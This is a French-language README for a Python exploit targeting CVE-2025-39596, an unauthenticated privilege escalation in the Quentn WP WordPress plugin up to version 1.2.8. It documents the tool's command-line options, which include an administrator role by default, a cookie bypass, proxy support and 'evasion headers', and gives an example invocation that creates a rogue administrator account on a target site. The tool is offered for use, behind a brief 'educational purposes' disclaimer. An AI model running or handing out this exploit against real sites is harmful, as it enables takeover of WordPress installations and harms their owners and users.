
Quentn WP <= 1.2.8 - Escalade de privilèges non authentifiée
Quentn WP <= 1.2.8 - Élévation de privilèges non authentifiée
Le plugin Quentn WP pour WordPress est vulnérable à une élévation de privilèges dans toutes les versions jusqu'à la 1.2.8 incluse. Cela permet à des attaquants non authentifiés d'élever leurs privilèges au niveau administrateur.
CVE-2025-395969.8 (Critique)Ce dépôt contient un exploit Python pour CVE-2025-39596, permettant la création d'un nouvel utilisateur administrateur WordPress sans authentification via une requête API conçue.
Fonctionnalités :
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
Arguments obligatoires :
-u, --url URL du site WordPress cible (ex. http://127.0.0.1/wordpress)-e, --email Email pour le nouveau compte administrateurArguments facultatifs :
-f, --fname Prénom (défaut : Pwn)-l, --lname Nom (défaut : Admin)-r, --role Rôle à attribuer (défaut : administrator)-k, --key Clé API Quentn si connue--cookie Cookie pour contournement authentifié si disponible--proxy Support proxy (ex. http://127.0.0.1:8080)--skip-ssl Ignorer la vérification SSL--extra Activer les en-têtes d'évasion supplémentairesExemple :
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | NxploitedCet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.
Toute utilisation abusive est strictement interdite.
L'auteur n'est pas responsable des dommages ou de l'utilisation abusive causés par ce code.
Par : Nxploited ( Khaled Alenazi )